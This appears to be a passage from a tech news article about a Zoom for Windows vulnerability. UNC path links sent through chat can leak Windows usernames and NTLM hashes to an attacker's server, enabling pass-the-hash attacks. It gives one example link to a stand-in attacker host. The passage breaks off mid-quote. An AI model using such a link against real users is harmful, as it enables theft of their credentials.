Attackers can use Zoom to steal users’ Windows credentials with no warning

reader comments

50 with 37 posters participating

Users of Zoom for Windows beware: the widely used software has a vulnerability that allows attackers to steal your operating system credentials, researchers said.

Discovery of the currently unpatched vulnerability comes as Zoom usage has soared in the wake of the coronavirus pandemic. With massive numbers of people working from home, they rely on Zoom to connect with co-workers, customers, and partners. Many of these home users are connecting to sensitive work networks through temporary or improvised means that don’t have the benefit of enterprise-grade firewalls found on-premises.

Embed network location here

Attacks work by using the Zoom chat window to send targets a string of text that represents the network location on the Windows device they’re using. The Zoom app for Windows automatically converts these so-called universal naming convention strings—such as //attacker.example.com/C$—into clickable links. In the event that targets click on those links on networks that aren’t fully locked down, Zoom will send the Windows usernames and the corresponding NTLM hashes to the address contained in the link.

Attackers can then use the credentials to access shared network resources, such as Outlook servers and storage devices. Typically, resources on a Windows network will accept the NTLM hash when authenticating a device. That leaves the networks open to so-called pass-the-hash attacks that don’t require a cracking technique to convert the hash to its corresponding plain-text password.

“It’s quite a shortcoming from Zoom,” Matthew Hickey, cofounder of the security boutique Hacker House, told me. “It’s a very trivial bug. With more of us working from home now,

Continue reading – Article source